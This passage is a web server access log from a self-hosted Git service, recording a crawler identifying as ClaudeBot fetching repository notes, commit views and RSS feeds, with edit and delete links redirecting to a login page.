"/windpacer/dbserver/rss/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 1658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=rendered" [Client 216.73.216.188] [Length 11251] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 5559] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=rendered" [Client 216.73.216.188] [Length 14284] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 29] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 10108] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=rendered" [Client 216.73.216.188] [Length 12116] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 10073] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=rendered" [Client 216.73.216.188] [Length 14079] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 10073] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=rendered" [Client 216.73.216.188] [Length 11045] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=source" [Client 216.73.216.188] [Length 13794] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=source" [Client 216.73.216.188] [Length 16914] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=source" [Client 216.73.216.188] [Length 11384] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 10089] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 216.73.216.188] [Length 11780] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=source" [Client 216.73.216.188] [Length 13566] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[15/Feb/2026:09:33:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=source" [Client 216.73.216.188] [Length 16674] [Gzip 4.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=source" [Client 216.73.216.188] [Length 11150] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 10472] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 216.73.216.188] [Length 12538] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 10403] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 216.73.216.188] [Length 12769] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 1999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 216.73.216.188] [Length 12173] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 216.73.216.188] [Length 13302] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 216.73.216.188] [Length 13559] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[15/Feb/2026:09:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 22223] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 22221] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 12562] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 216.73.216.188] [Length 11279] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 12207] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 22222] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:59 +0000] - 200 